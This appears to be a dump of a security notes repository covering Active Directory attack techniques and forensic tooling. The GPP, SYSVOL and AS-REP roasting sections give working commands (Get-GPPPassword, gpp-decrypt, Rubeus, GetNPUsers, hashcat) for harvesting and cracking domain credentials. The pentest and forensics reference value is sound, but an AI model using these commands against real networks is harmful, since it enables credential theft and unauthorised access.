├── .gitignore ├── Active_Directory ├── Exploitation-ACL_exploiting.md ├── Exploitation-Azure_AD_Connect.md ├── Exploitation-Certificate_Services.md ├── Exploitation-Credentials_theft_shuffling.md ├── Exploitation-DC_CVE.md ├── Exploitation-GPO_users_rights.md ├── Exploitation-GPP_and_shares_searching.md ├── Exploitation-Kerberos_AS_REP_Roasting.md ├── Exploitation-Kerberos_Kerberoasting.md ├── Exploitation-Kerberos_Silver_Tickets.md ├── Exploitation-Kerberos_delegations.md ├── Exploitation-Kerberos_tickets_usage.md ├── Exploitation-NTLM_capture_and_relay.md ├── Exploitation-Operators_to_Domain_Admins.md ├── Exploitation-Password_spraying.md ├── Exploitation-gMS_accounts.md ├── Post_Exploitation-Kerberos_Golden_Tickets.md ├── Post_Exploitation-Persistence.md ├── Post_Exploitation-Trusts_hopping.md ├── Post_Exploitation-ntds_dit_dumping.md ├── Recon-AD_scanners.md └── Recon-Domain_Recon.md ├── Android └── Static_Analysis.md ├── BinExploit ├── Linux │ └── ELF64_ROP_leaks.md └── Reverse.md ├── Cloud └── Azure.md ├── DFIR ├── Cloud │ ├── AWS.md │ ├── Azure.md │ └── README.md ├── Common │ ├── Browsers_forensics.md │ ├── Docker_forensics.md │ ├── Email_forensics.md │ ├── Image_acquisition_and_mounting.md │ ├── Memory_forensics.md │ └── Web_logs_analysis.md ├── Linux │ ├── README.md │ ├── TTPs_Analysis │ │ ├── README.md │ │ └── Timestomping.md │ └── _Artefacts_overview.md ├── Tools │ ├── Dissect.md │ ├── KAPE.md │ ├── README.md │ ├── Splunk.md │ ├── Velociraptor.md │ └── plaso.md └── Windows │ ├── Artefacts │ ├── Amcache.md │ ├── EVTX.md │ ├── Jumplist.md │ ├── LNKFile.md │ ├── MFT.md │ ├── MISC.md │ ├── Outlook_files.md │ ├── Prefetch.md │ ├── RecentFilecache.md │ ├── RecycleBin.md │ ├── SRUM.md │ ├── Shellbags.md │ ├── Shimcache.md │ ├── Timestamps.md │ ├── User_Access_Logging.md │ ├── UsnJrnl.md │ └── _Artefacts_overview.md │ ├── README.md │ └── TTPs_Analysis │ ├── Accounts_usage.md │ ├── ActiveDirectory_persistence.md │ ├── ActiveDirectory_replication_metadata.md │ ├── EVTX_integrity.md │ ├── Lateral_movement.md │ ├── Local_persistence.md │ ├── PowerShell_activity.md │ ├── Program_execution.md │ ├── README.md │ ├── System_uptime.md │ └── Timestomping.md ├── General ├── External_recon.md ├── File_Transfer.md ├── Passwords_cracking.md ├── Pivoting.md ├── Ports_scan.md └── Shells.md ├── L7 ├── 1-Methodology.md ├── 1099_JavaRMI │ └── Methodology.md ├── 111-2049_NFS │ └── Methodology.md ├── 11211_memcached │ └── Methodology.md ├── 113_Ident │ └── Methodology.md ├── 135_MSRPC │ └── Methodology.md ├── 137-139_NetBIOS │ └── Methodology.md ├── 1433_MSSQL │ └── Methodology.md ├── 1521_ORACLE_DB │ └── Methodology.md ├── 161_SNMP │ └── Methodology.md ├── 21_FTP │ └── Methodology.md ├── 22_SSH │ └── Methodology.md ├── 25_SMTP │ └── Methodology.md ├── 27017-27018_MongoDB │ └── Methodology.md ├── 3128_Proxy │ └── Methodology.md ├── 3306_MySQL │ └── Methodology.md ├── 3389_RDP │ └── Methodology.md ├── 389-3268_LDAP │ └── Methodology.md ├── 445_SMB │ └── Methodology.md ├── 512-513_REXEC-RLOGIN │ └── Methodology.md ├── 53_DNS │ └── Methodology.md ├── 554_RTSP │ └── Methodology.md ├── 5985-5986_WSMan │ └── Methodology.md ├── 8000_JDWP │ └── Methodology.md └── 9100_Printers │ └── Methodology.md ├── Linux ├── Local_privilege_escalation.md └── Post_exploitation.md ├── Miscellaneous ├── Coverage_guideded_fuzzing.md ├── Regex101.md └── WinDbg_kernel.md ├── README.md ├── Red_Team ├── Cobalt_Strike.md ├── EDR_bypass_with_EDRSandBlast.md ├── OpSec_OperatingSystems.md └── Phishing_OfficeDocuments.md ├── SUMMARY.md ├── WebApps ├── CMS_and_softwares │ ├── ColdFusion.md │ ├── DotNetNuke.md │ ├── Jenkins.md │ ├── Jira.md │ ├── Ovidentia.md │ ├── README.md │ ├── WebDAV.md │ └── WordPress.md ├── Exploitation-Authentication.md ├── Exploitation-File_upload.md ├── Exploitation-GraphQL.md ├── Exploitation-LDAP_injections.md ├── Exploitation-Local_and_remote_file_inclusions.md ├── Exploitation-NoSQL_injections │ ├── NoSQLMap.md │ ├── README.md │ └── mongoDB.md ├── Exploitation-Overview.md ├── Exploitation-SQL_injections │ ├── MSSQL.md │ ├── MySQL.md │ ├── README.md │ ├── SQLMAP.md │ └── SQLite.md ├── Recon-Application_mapping.md ├── Recon-Attack_surface.md ├── Recon-Hostnames_discovery.md └── Recon-Server_exposure.md └── Windows ├── Bypass_AppLocker.md ├── Bypass_PS_ConstrainedLanguageMode.md ├── Lateral_movements ├── CrackMapExec.md ├── Local_credentials_reuse.md ├── Over_DCOM.md ├── Over_SMB.md ├── Over_WMI.md ├── Over_WinRM.md └── README.md ├── Local_privilege_escalation.md ├── Post_exploitation ├── Credentials_dumping.md ├── Defense_evasion.md ├── Local_persistence.md └── README.md └── Shellcode_and_PE_loader.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Node rules: 2 | ## Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files) 3 | .grunt 4 | 5 | ## Dependency directory 6 | ## Commenting this out is preferred by some people, see 7 | ## https://docs.npmjs.com/misc/faq#should-i-check-my-node_modules-folder-into-git 8 | node_modules 9 | 10 | # Book build output 11 | _book 12 | 13 | # eBook build output 14 | *.epub 15 | *.mobi 16 | *.pdf -------------------------------------------------------------------------------- /Active_Directory/Exploitation-GPO_users_rights.md: -------------------------------------------------------------------------------- 1 | # Active Directory - GPO users rights 2 | 3 | ### Overview 4 | 5 | GPO can be used to assign `users rights` on the computer objects they are 6 | applied to. 7 | 8 | User rights fall into two general categories: 9 | - `logon rights` which gives the rights to logon to the specified user and 10 | define the logon type. 11 | - `privileges` that define a number of specific privileges on the computer 12 | object. 13 | 14 | The `user rights` that can be used to gain access and/or compromise the 15 | computer objects they are applied to are detailed below. Reviewing these user 16 | rights can lead to more vectors of credentials re-use, notably if user rights 17 | are defined for one of the following group: 18 | - `Everyone`, SID: `S-1-1-0` 19 | - `Anonymous`, SID: `S-1-5-7` 20 | - `Authenticated Users`, SID: `S-1-5-11` 21 | - `Users`, SID: `S-1-5-32-545` 22 | - `Domain Users`, SID: `S-1-5--513` 23 | - `Domain Computers`, SID: `S-1-5--515` 24 | 25 | ### Find user rights assignments in GPO 26 | 27 | ###### Resultant Set of Policy 28 | 29 | The Windows `gpresult` built-in utility can be used to compute the `Resultant 30 | Set of Policy (RSoP)` for the current, or specified user, on the local or a 31 | remote system. It can generate an `HTLM` report referencing the parameters 32 | effectively applied by `GPO` on the system. 33 | 34 | The `users rights` assigned can be found in 35 | `Computer Details -> Windows Setting -> Local Policies/User Rights Assignment`. 36 | 37 | ``` 38 | # Generates the RSoP for the current user on the local system. 39 | gpresult /H 40 | 41 | # Generates the RSoP for the specified user on the local system. 42 | gpresult /user \ /H 43 | 44 | # Generates the RSoP for the current or specified user on the remote system (using the eventual given credentials). 45 | gpresult [/u /p ] /s [/user \] /H 46 | ``` 47 | 48 | ###### Domain wide enumeration 49 | 50 | The `Grouper2` C# application and `PingCastle`'s `healthcheck` can be used to 51 | enumerate user rights definition in the most sensible GPO. 52 | 53 | ``` 54 | Grouper2.exe -g -f 55 | Grouper2.exe -d "" -u "" -p "" -s "\\\SYSVOL" -g -f 56 | ``` 57 | 58 | All the GPOs in the domain can also be exported in an `HTML` or `XML` report 59 | using the PowerShell `GroupPolicy` module's `Get-GPOReport` cmdlet: 60 | 61 | ``` 62 | # Export all the GPO in the specified domain using the current security context. 63 | # runas /Netonly should be used for enumeration from a non-domain joined computer. 64 | 65 | Get-GPOReport -All -ReportType [-Domain ] [-Server ] -Path 66 | ``` 67 | 68 | A more manual search in all accessible GPO from the given privileges can 69 | be conducted directly in PowerShell: 70 | 71 | ``` 72 | # Conducting the search either from the current user context or using the specified credential 73 | net use Z: \\\SYSVOL 74 | net use Z: \\\SYSVOL /user:\ 75 | Get-ChildItem -Path Z:\ -Recurse -Force | Select-String SeInteractiveLogonRight,SeRemoteInteractiveLogonRight,SeImpersonatePrivilege,SeAssignPrimaryPrivilege,SeTcbPrivilege,SeBackupPrivilege,SeRestorePrivilege,SeCreateTokenPrivilege,SeLoadDriverPrivilege,SeTakeOwnershipPrivilege,SeDebugPrivilege 76 | net use Z: /delete 77 | ``` 78 | 79 | `PowerView` can be used to find where exploitable GPO are linked and 80 | **possibly** applied. Note: GPO can be linked to an OU but not necessarily 81 | applied, as an OU can `blocks inheritance` on an not `enforced` GPO or a 82 | conflicting GPO with a higher precedence order may supplant the exploitable 83 | GPO. 84 | 85 | ``` 86 | Get-DomainOU -GPLink "" | ForEach-Object { 87 | Get-DomainComputer -SearchBase "LDAP://$($_.distinguishedname)" | Ft Name 88 | } 89 | ``` 90 | 91 | ### User rights exploitation 92 | 93 | ###### Logon rights 94 | 95 | The following logon rights can be defined to allow an user to logon onto the 96 | computer: 97 | 98 | | Right | Description | Exploitation technique | 99 | |-------|-------------|------------------------| 100 | | `SeInteractiveLogonRight` | Allows a user to connect locally on the computer | Require a physical access to the computer. | 101 | | `SeRemoteInteractiveLogonRight` | Allow logon through Terminal Services | Interactive logon using a RDP client. | 102 | 103 | Note that the `SeNetworkLogonRight` allows a user to access the exposed shares 104 | on the computer (under restrictions of the shares and NTFS permissions) but is 105 | not sufficient by itself to remotely execute commands. 106 | 107 | The `SeServiceLogonRight` is not directly exploitable neither as only users 108 | with administrative privileges can install and configure services. 109 | 110 | The `SeBatchLogonRight` alone can not be used to remotely create and run 111 | scheduled tasks. 112 | 113 | ###### Privileges 114 | 115 | The following privilege tokens can be used to locally elevate privileges to 116 | `NT AUTHORITY\SYSTEM`: 117 | - `SeImpersonatePrivilege` 118 | - `SeAssignPrimaryPrivilege` 119 | - `SeTcbPrivilege` 120 | - `SeBackupPrivilege` 121 | - `SeRestorePrivilege` 122 | - `SeCreateTokenPrivilege` 123 | - `SeLoadDriverPrivilege` 124 | - `SeTakeOwnershipPrivilege` 125 | 126 | The `SeDebugPrivilege` privilege can be used as well to directly dump the 127 | `LSASS` process. 128 | 129 | Note that the exploitation of those privilege tokens 130 | Refer to the `[Windows] Local privilege escalation` for more information on 131 | how to exploit those privilege tokens. 132 | 133 | -------------------------------------------------------------------------------- 134 | 135 | ### References 136 | 137 | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-xp/bb457125(v=technet.10)?redirectedfrom=MSDN 138 | 139 | https://adsecurity.org/?p=3658 140 | 141 | https://wald0.com/?p=179 142 | 143 | https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ 144 | 145 | https://www.ssi.gouv.fr/uploads/IMG/pdf/Lucas_Bouillot_et_Emmanuel_Gras_-_Chemins_de_controle_Active_Directory.pdf 146 | 147 | https://labs.f-secure.com/tools/sharpgpoabuse 148 | 149 | https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/15/group-policy-basics-part-2-understanding-which-gpos-to-apply/ 150 | -------------------------------------------------------------------------------- /Active_Directory/Exploitation-GPP_and_shares_searching.md: -------------------------------------------------------------------------------- 1 | # Active Directory - GPO and shares searching 2 | 3 | ### Overview 4 | 5 | The `SYSVOL` folder, accessible on all Domain Controller to all authenticated 6 | users, should be carefully reviewed for sensible information (notably the 7 | `Group Policy Preferences (GPP)` data). 8 | Some content may be accessible to unauthenticated users (`NULL session` or 9 | `GUEST`) and can be a way to gain authenticated access to the Domain. 10 | 11 | ###### SMB 12 | 13 | The `Server Message Block (SMB)` protocol, one version of which was also known 14 | as `Common Internet File System (CIFS)`, is an application-layer network 15 | protocol used for providing shared access to files, printers, and serial ports 16 | and miscellaneous communications between nodes on a network. It also provides 17 | an authenticated inter-process communication mechanism. Most usage of SMB 18 | involves computers running Microsoft Windows. 19 | 20 | ###### Group Policy 21 | 22 | `Group Policy` is a feature of the Microsoft `Windows NT` family of operating 23 | systems that controls the working environment of user accounts and computer 24 | accounts. `Group Policy` provides centralized management and configuration of 25 | operating systems, applications, and users' settings in an Active Directory 26 | environment. A version of `Group Policy` called `Local Group Policy` (`LGPO` or 27 | `LocalGPO`) also allows `Group Policy Object (GPO)` management on standalone 28 | and non-domain joined computers. 29 | 30 | Two kinds of `Group Policy` exist : `Group Policy Object (GPO)` and `Group 31 | Policy Preferences (GPP)`. 32 | One of the most useful features of the `GPP` is the ability to store and use 33 | credentials in several scenarios (local user creation, map drives, etc.). When 34 | a new `GPP` is created, an associated `XML` file is created in the `SYSVOL` 35 | share with the relevant configuration data and if a password is provided, it is 36 | `AES-256` bit encrypted. Microsoft published the `AES` private key which can be 37 | used to decrypt the password. Since authenticated users (any domain user or 38 | users in a trusted domain) have read access to the `SYSVOL` share, anyone in 39 | the domain can search the `SYSVOL` share for `XML` files containing a 40 | `cpassword` field, which is the field that contains the `AES` encrypted 41 | password. There are a few more differences between the two, for additional 42 | details refer to the following article : 43 | http://techgenix.com/policies-vs-preferences/. 44 | 45 | ###### SYSVOL 46 | 47 | The `SYSVOL` is the domain-wide share in Active Directory to which all 48 | authenticated users have read access. The `SYSVOL` contains logon scripts, 49 | group policy data, and other domain-wide data which needs to be available 50 | anywhere there is a Domain Controller (since the `SYSVOL` is automatically 51 | synchronized and shared among all Domain Controllers). 52 | 53 | In addition to the `GPP` data potentially containing password, more sensible 54 | information can be stored in the `SYSVOL` share and its content should be 55 | reviewed. 56 | 57 | ### Group Policy Preferences (GPP) password searching 58 | 59 | As stated above, `GPP` may be used in the domain to manage and configure local 60 | accounts on domain joined computers. The `GPP` defined may thus contain 61 | passwords and the `SYSVOL` folder should be reviewed. 62 | 63 | `PingCastle`'s `healthcheck` searches a Domain Controller's `SYSVOL` share for 64 | any `XML` (`*.xml`) files that may contain a `cpassword` field and 65 | automatically decrypt any password found. 66 | 67 | Additionally, the `Get-GPPPassword` cmdlet of the `PowerSploit` suite searches 68 | a Domain Controller's `SYSVOL` share for `groups.xml`, `scheduledtasks.xml`, 69 | `services.xml` and `datasources.xml` files and returns any (decrypted) 70 | `cpassword` passwords: 71 | 72 | ``` 73 | Get-GPPPassword 74 | Get-GPPPassword -Server 75 | ``` 76 | 77 | To manually search for `cpassword` field / passwords in `GPP`, the `Agent 78 | Ransack` GUI or the `SauronEye` CLI tools can be used. Refer to the 79 | `Distributed searching tools` section below for more information. 80 | 81 | The Ruby `gpp-password` script can be used to decrypt a GPP password: 82 | 83 | ``` 84 | gpp-decrypt 85 | ``` 86 | 87 | ### Distributed shares searching 88 | 89 | ###### Enumerate accessible shares 90 | 91 | The `PingCastle`'s `share` module can be used to enumerate the machines joined 92 | in the current, or specified, Active Directory domain and then retrieve the 93 | exposed shares by each machines through direct `SMB` queries. 94 | 95 | ``` 96 | PingCastle.exe --scanner share 97 | PingCastle.exe --server --user "\" --password "" --scanner share 98 | ``` 99 | 100 | From an unauthenticated perspective, `nmap` can be used to conduct a network 101 | scan to enumerate exposed `SMB` services and to list the accessible shares on 102 | the accessible services: 103 | 104 | ``` 105 | nmap --script smb-enum-shares.nse -p 445 106 | nbtscan -r 107 | ``` 108 | 109 | For more practical information about shares listing and searching, refer to the 110 | `[L7 SMB] - Methodology` note. 111 | 112 | ###### Distributed searching tools 113 | 114 | The `Agent Ransack` GUI or `SauronEye` CLI files searching tool can be used to 115 | search files in `SMB` shares for specified keywords or regex, such as 116 | `pass*`, etc. 117 | 118 | ``` 119 | SauronEye.exe --directories <...> --filetypes <.FILE_EXTENSION> <...> --contents --keywords 120 | ``` 121 | -------------------------------------------------------------------------------- /Active_Directory/Exploitation-Kerberos_AS_REP_Roasting.md: -------------------------------------------------------------------------------- 1 | # Active Directory - Kerberos AS_REP roasting 2 | 3 | ### Overview 4 | 5 | An ASP_REP roasting attack is an attack on the `Kerberos` authentication 6 | protocol that involves compromising the password of an user account that do not 7 | require `Kerberos` pre-authentication. 8 | 9 | The attack is based on the fact that the `KRB_AS_REP` response, in reply from 10 | the `KDC (Key Distribution Center)` for an initial authentication request 11 | `KRB_AS_REQ` to the `Authentication Service (AS)`, contains ciphertext 12 | encrypted using the client's secret key. 13 | 14 | By default, the `KRB_AS_REQ` must include a timestamp encrypted with the 15 | client's secret key, in order to permit the verification of the user identity 16 | before the `KDC` returns a `KRB_AS_REP` response. This verification is omitted 17 | for user accounts that do not require `Kerberos` pre-authentication, i.e 18 | accounts with the account property `DONT_REQ_PREAUTH`. These user accounts 19 | secrets are exposed to offline cracking, against the ciphertext, attack that 20 | are much faster and can not be time restricted. 21 | 22 | ### Automated DONT_REQ_PREAUTH user accounts discovery and export of AS-REP responses 23 | 24 | The following tools can be used to automate the discovery of user accounts that 25 | do not require `Kerberos` pre-authentication and the request and export of 26 | `KRB_AS_REQ` response for offline cracking. 27 | 28 | In order to enumerate the domain user accounts, `Rubeus` / `GetNPUsers.py` must 29 | be started in a domain authenticated security context or provided with working 30 | domain credentials. 31 | 32 | ``` 33 | Rubeus.exe asreproast /outfile: 34 | Rubeus.exe asreproast /format:john /outfile: 35 | 36 | Rubeus.exe asreproast /creduser:'\' /credpassword:'' /dc: /domain: /outfile: 37 | 38 | # Will attempt to request a TGT for all users. 39 | GetNPUsers.py -request /[:] 40 | ``` 41 | 42 | ### DONT_REQ_PREAUTH user accounts discovery 43 | 44 | The following tools can be used to discover user accounts that do not require 45 | `Kerberos` pre-authentication: 46 | 47 | ``` 48 | Get-ADUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))" 49 | Get-ADUser -Server -Credential -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))" 50 | 51 | Get-NetUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))" 52 | Get-NetUser -Server -Credential -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))" 53 | ``` 54 | 55 | ### Request and export of KRB_AS_REP responses 56 | 57 | The following tools can be used to request and export `KRB_AS_REP` for user 58 | accounts that do not require `Kerberos` pre-authentication. 59 | 60 | The following operations do not require the knowledge of valid credentials. 61 | 62 | ``` 63 | Rubeus.exe asreproast /user: /outfile: 64 | Rubeus.exe asreproast /dc: /domain: /user: /outfile: 65 | 66 | GetNPUsers.py '/' -usersfile 67 | GetNPUsers.py '/' -dc-ip -usersfile -format john 68 | ``` 69 | 70 | ### Offline cracking of KRB_AS_REP responses 71 | 72 | Both `John the Ripper` (magnumripper fork) and `hashcat` can be used to crack 73 | the `KRB_AS_REP` responses. 74 | 75 | The hash needs to respect the following format to be recognized `hashcat`: 76 | 77 | ``` 78 | # ENCRYPTION_TYPE 23 = RC4 79 | # ENCRYPTION_TYPE 17 = AES128 80 | # ENCRYPTION_TYPE 18 = AES256 81 | 82 | $krb5tgs$$*@:$85DA[...] 83 | ``` 84 | 85 | Depending on the tool used, the hash retrieved may need to be manually updated. 86 | 87 | The following commands can be used to crack the `KRB_AS_REP` responses: 88 | 89 | ``` 90 | # Its recommended to use Hashcat on a Windows OS for better performance due to driver compatibility 91 | hashcat64.exe -m 18200 -a 0 [-r ] '[ | ]' 92 | 93 | john --wordlist= 94 | ``` 95 | 96 | -------------------------------------------------------------------------------- 97 | 98 | ### References 99 | 100 | https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ 101 | https://tools.ietf.org/html/rfc4120#page-60 102 | https://beta.hackndo.com/kerberos-asrep-roasting/ 103 | https://adsecurity.org/?p=227 104 | -------------------------------------------------------------------------------- /BinExploit/Reverse.md: -------------------------------------------------------------------------------- 1 | ### strings 2 | 3 | The Linux `strings` builtin and the Windows `sysinternals` `strings` utility can 4 | be used to extract the printable characters contained in a file, and notably 5 | in non-text files. 6 | 7 | By default, only the sequences that are at least 4 characters long are 8 | retrieved. 9 | 10 | ``` 11 | strings 12 | ``` 13 | 14 | ### objdump 15 | 16 | The GNU `objdump` command line utility can be used to disassemble the assembler 17 | contents of the executable sections of a binary: 18 | 19 | ``` 20 | objdump -d 21 | ``` 22 | 23 | ### radare2 24 | 25 | The `radare2` suite is an open source reverse engineering framework consisting 26 | of multiples tools and features. 27 | 28 | The framework supports multiples architectures (i386, x86-64, ARM, etc.), 29 | file formats (PE, PE+, ELF, Mach-O, etc.) and operating systems (Windows, 30 | GNU/Linux, OS X, etc.). 31 | 32 | The `rabin2` utility can be used to retrieve information and protection 33 | mechanisms of a binary: 34 | 35 | ``` 36 | rabin2 -I 37 | 38 | radar2 39 | [0xXXX] > iL 40 | ``` 41 | 42 | The strings in the binary can be printed and searched into using `izz`: 43 | 44 | ``` 45 | [0xXXX] > iiz 46 | [0xXXX] > iiz~ 47 | [0xXXX] > iiz~password 48 | ``` 49 | 50 | The visual mode can entered by using the `v` command and quitted using the `q` 51 | command. In visual mode, the `p` command can be used to switch between display 52 | mode. 53 | 54 | 55 | ### GDB 56 | 57 | ###### Binaries without debugging symbols 58 | 59 | Debugging a binary compiled with out the debbugging symbols ("no debugging 60 | symbols found") is possible as GDB can directly handle assembly code. 61 | 62 | GDB uses By default the AT&T assembly syntax. The following command can be used 63 | to switch to the Intel syntax: 64 | 65 | ``` 66 | set disassembly-flavor intel 67 | ``` 68 | 69 | To setup a breakpoint, the binary entry point can be retrieved using the GDB 70 | `info` command: 71 | 72 | ``` 73 | (gdb) info file 74 | Entry point: 0xXXXXXX 75 | 76 | b *0xXXXXXX 77 | ``` 78 | 79 | The `nexti` (shortcut `ni`) and the `stepi` (shortcut `si`) commands are the 80 | assembly counter part of the soure code `next` and `step` commands. 81 | 82 | The `examine` (shortcut `x`) command can be used to display the assembly code 83 | after the breakpoint: 84 | 85 | ``` 86 | # N = number of assembly line to print 87 | # $pc = GDB variable for the program counter register 88 | 89 | x/i $pc 90 | x/5i $pc 91 | ``` 92 | 93 | ### OllyDbg 94 | 95 | `OllyDbg` is a GUI 32-bit assembler level analyzing debugger for Microsoft 96 | Windows. 97 | 98 | The `Search for -> All referenced strings` functionality allows to retrieve all 99 | printable strings contained in the binary and their address location for 100 | breakpoint setting. 101 | 102 | ### dnSpy 103 | 104 | `dnSpy` is a GUI debugger and assembly editor which can be used to debug 32 105 | or 64 bits .NET applications and edit assemblies in C# or Visual Basic. 106 | 107 | The GUI interface can be launched using the `dnSpy.exe` or `dnSpy-x86.exe` 108 | programs. 109 | 110 | -------------------------------------------------------------------------------- 111 | 112 | ### References 113 | 114 | https://reverseengineering.stackexchange.com/questions/1935/how-to-handle-stripped-binaries-with-gdb-no-source-no-symbols-and-gdb-only-sho 115 | -------------------------------------------------------------------------------- /DFIR/Cloud/README.md: -------------------------------------------------------------------------------- 1 | # DFIR - Linux 2 | -------------------------------------------------------------------------------- /DFIR/Common/Docker_forensics.md: -------------------------------------------------------------------------------- 1 | # DFIR - Docker 2 | 3 | ### Image analysis 4 | 5 | ```bash 6 | # Lists the images available. 7 | docker image ls 8 | 9 | # Automated analysis on the specified image, to retrieve a number of information: exposed service(s), Docker file, etc. 10 | docker run -t --rm -v /var/run/docker.sock:/var/run/docker.sock:ro pegleg/whaler -sV=1.36 11 | 12 | # Displays information on the specified image. 13 | docker image inspect | jq 14 | 15 | # Validates the trust on the specified image. 16 | docker trust inspect | jq 17 | 18 | # Print the history of the commands used to build the image. 19 | docker image history --no-trunc 20 | # Adds timestamps to the commands history. 21 | docker history --no-trunc --format "{{.CreatedAt}}: {{.CreatedBy}}" 22 | 23 | # Extract a specific file from an image without running a container. 24 | container_id=`docker create ` 25 | docker cp $container_id:/ 26 | 27 | # Save a docker image as a tar archive, containing for each layers of the image metadata (docker-file like) and image files. 28 | docker save -o 29 | tar -xvf 30 | cat /json | jq 31 | ``` 32 | -------------------------------------------------------------------------------- /DFIR/Common/Web_logs_analysis.md: -------------------------------------------------------------------------------- 1 | # DFIR - Web logs analysis 2 | 3 | ### Webservers logs format 4 | 5 | Webservers, such as `Apache` or `nginx`, usually follow known / standard log 6 | formats by default. 7 | 8 | The following standard log formats are notably in use: 9 | 10 | | Name | Template | Example | Remarks | 11 | |------|----------|---------|-------------| 12 | | `Common Log Format (CLF)` | `%h %l %u %t "%r" %>s %b`

` <- \| IDENTITY> "" ` | `127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326` | A `-` indicates that the information is not present.

The `` field is not reliable and will often not be logged.

The `` field may not be indicated (`-`) even if the request was identified at a higher level. For instance, `CMS`, such as `WordPress`, may not rely on webserver authentication and can identify users at the application level. In such case, the webserver log, such as `Apache`, will not contain user information while the request was however dully authentified. | 13 | | `NCSA Combined Log Format` | `%h %l %u %t "%r" %>s %b "%{Referer}" "%{User-agent}"`

` <- \| IDENTITY> "" "" ""` | `127.0.0.1 - frank [10/Oct/2022:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 "http://www.example.com/start.html" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"` | Identical to the `Common Log Format (CLF)` format, with the addition of the `Referer` and `User-agent` fields. | 14 | | `IIS Log File Format` | | | | 15 | | `W3C Extended Log File Format` | | | | 16 | 17 | ### Graphical web logs parsers / viewer 18 | 19 | ###### GoAccess 20 | 21 | [`GoAccess`](https://goaccess.io/) is a C program that can be used to parse 22 | webserver logs to get a first level of statistics for the given logs: total 23 | requests, unique visitors, operating systems and browsers stats (if user-agent 24 | information is available), accessed endpoints, etc. `GoAccess` supports many 25 | web log formats (Apache, Nginx, Amazon S3, Elastic Load Balancing, CloudFront, 26 | etc.) and can outputs reports in `JSON`, `CSV` or `HTML`. 27 | 28 | Statistics linked to specifics IPs require to first filter the log files. 29 | 30 | ```bash 31 | # Generate a static HTLM report with statistics for the given input log file(s). 32 | goaccess -o 33 | 34 | # Filters the given log files on the specified IPs to generate a targeted statistics report. 35 | grep -i "IP1\|...\|IPn" | goaccess -o 36 | ``` 37 | 38 | ###### HTTP logs viewer 39 | 40 | The [`http Logs Viewer`](https://www.apacheviewer.com/) application, formerly 41 | `Apache Logs Viewer`, supports various webservers logs (Apache, IIS, nginx, 42 | etc.) and allows filtering based on various fields. 43 | 44 | Only limited functionalities are however available in the free version and 45 | some key features require the paid version (20$ for individuals, 70$ for 46 | corporations as of 2022-08). 47 | 48 | ### Automated attack patterns detection 49 | 50 | ###### Apache access logs 51 | 52 | The `Scalp!` Python script can be used in combination with the `PHPIDS` 53 | project's regular expression filters to automatically detect common attacks 54 | (`SQL` injection, `cross-site scripting (XSS)`, local and remote file 55 | inclusion, etc.). The `PHPIDS` project's `default_filter.xml` defines 78 56 | optimized and tested regex. 57 | 58 | `Scalp!` parses the specified `Apache` logs files and leverages the 59 | `PHPIDS` project's regular expressions to detect the matching attack patterns. 60 | 61 | ``` 62 | # nanopony GitHub repository 63 | --exhaustive: Will not stop at the first type of attacks detected 64 | --tough: Will attempt to decode potential attack vectors. Increases the analysis time but can greatly reduce false-positives 65 | 66 | python3 scalp.py --exhaustive --tough -l -f -o 67 | ``` 68 | 69 | The analysis of 10 000 lines of logs takes around 90 seconds (on a 70 | `i7-4700MQ` CPU), and while `Scalp!` implements a time frame filter, the 71 | functionnality does not seem to be functionnal. 72 | 73 | For larger `Apache` log files, the files can be splited in multiple parts and 74 | the analysis multi-threaded, to the maximun processing power, using the Linux 75 | `xargs` utility. Doing so, the analysis time of 100 000 lines of logs is 76 | reduced to around 200 seconds (on a `i7-4700MQ` CPU). 77 | 78 | ``` 79 | FILE_NAME= 80 | OUTPUT_FOLDER= 81 | SCALP_PATH= 82 | FILTER_PATH= 83 | NUMBER_LINES=10000 84 | 85 | split -d -l $NUMBER_LINES $FILE_NAME "$PWD/$OUTPUT_FOLDER/$FILE_NAME" 86 | find "$PWD/$OUTPUT_FOLDER" -maxdepth 1 -type f | xargs -P0 -I {} python3 $SCALP_PATH --exhaustive --tough -l {} -f $FILTER_PATH -o "$PWD/$OUTPUT_FOLDER" 87 | ``` 88 | 89 | -------------------------------------------------------------------------------- 90 | 91 | ### References 92 | 93 | https://httpd.apache.org/docs/current/logs.html 94 | -------------------------------------------------------------------------------- /DFIR/Linux/README.md: -------------------------------------------------------------------------------- 1 | # DFIR - Linux 2 | -------------------------------------------------------------------------------- /DFIR/Linux/TTPs_Analysis/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Qazeer/InfoSec-Notes/9340c61f285ec85e329b3bafdad724e0aa69e8f0/DFIR/Linux/TTPs_Analysis/README.md -------------------------------------------------------------------------------- /DFIR/Linux/TTPs_Analysis/Timestomping.md: -------------------------------------------------------------------------------- 1 | # DFIR - Linux - Timestomping 2 | 3 | ### Overview 4 | 5 | Timestomping is the action of modifying the timestamps of a file (on Linux 6 | systems, generally on a `ext3` or `ext4` partition). It can notably be used to 7 | evade digital forensic investigation by making malicious files look legitimate 8 | or being out of the presupposed attack timeframe. 9 | 10 | This technique is identified by 11 | [MITRE ATT&CK T1070.006](https://attack.mitre.org/techniques/T1070/006/). 12 | 13 | ###### Linux ext3 / ext4 partitions timestamps 14 | 15 | On Linux `ext3` partitions each file (and folders) is associated with three 16 | timestamps: 17 | - `atime`, for `access time`, which corresponds to the last access to the 18 | file (but is in practice not completely reliability updated). 19 | - `mtime`, for `modification time`, which corresponds to the last 20 | modification to the file content or addition / renaming / deletion of a 21 | file in the folder. 22 | - `ctime`, for `change time`, which corresponds to the last modification to 23 | the file or folder's metadata (name, owner, permissions, etc.). If 24 | the content of a file / folder is modified, the `ctime` timestamp is also 